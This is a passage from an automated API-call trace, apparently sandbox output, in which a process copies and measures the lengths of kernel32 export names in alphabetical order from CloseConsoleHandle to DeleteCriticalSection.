[0087.318] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.318] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.318] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.318] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.318] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.318] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.318] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.318] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.318] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.318] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.318] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.318] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.319] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.319] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.319] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.319] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.319] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.319] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.319] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.319] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.319] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.319] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.319] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.319] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.319] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.319] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.319] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.319] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.319] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.319] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.319] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.319] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.319] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.319] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.319] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.319] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.319] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.319] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.319] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.319] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.319] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.319] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.319] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.319] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.319] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.319] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.319] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.319] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.319] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.319] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.320] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.320] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.320] lstrlenA (lpString="COPYFILEA") returned 9 [0087.320] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.320] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.320] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.320] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.320] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.320] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.320] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.320] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.320] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.320] lstrlenA (lpString="COPYFILEW") returned 9 [0087.320] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.320] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.320] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.320] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.320] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.320] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.320] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.320] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.320] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.320] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.320] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.320] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.320] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.320] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.320] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.320] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.320] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.320] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.320] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.320] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.320] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.320] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.320] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.321] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.321] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.321] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.321] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.321] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.321] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.321] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.321] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.321] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.321] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.321] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.321] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.321] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.321] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.321] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.321] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.321] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.321] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.321] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.321] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.322] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.322] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.322] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.322] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.322] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.322] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.322] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.322] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.322] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.322] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.322] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.322] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.322] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.322] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.322] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.322] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.322] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.322] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.322] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.323] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.323] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.323] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.323] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.323] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.323] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.323] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.323] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.323] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.323] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.323] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.323] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.323] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.323] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.323] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.323] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.323] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.323] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.323] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.323] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.324] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.324] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.324] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.324] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.324] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.324] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.324] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.324] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.324] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.324] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.324] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.324] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.324] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.324] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.324] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.324] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.324] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.324] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.324] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.325] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.325] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.325] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.325] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.325] lstrlenA (lpString="DELETEATOM") returned 10 [0087.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.325] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" 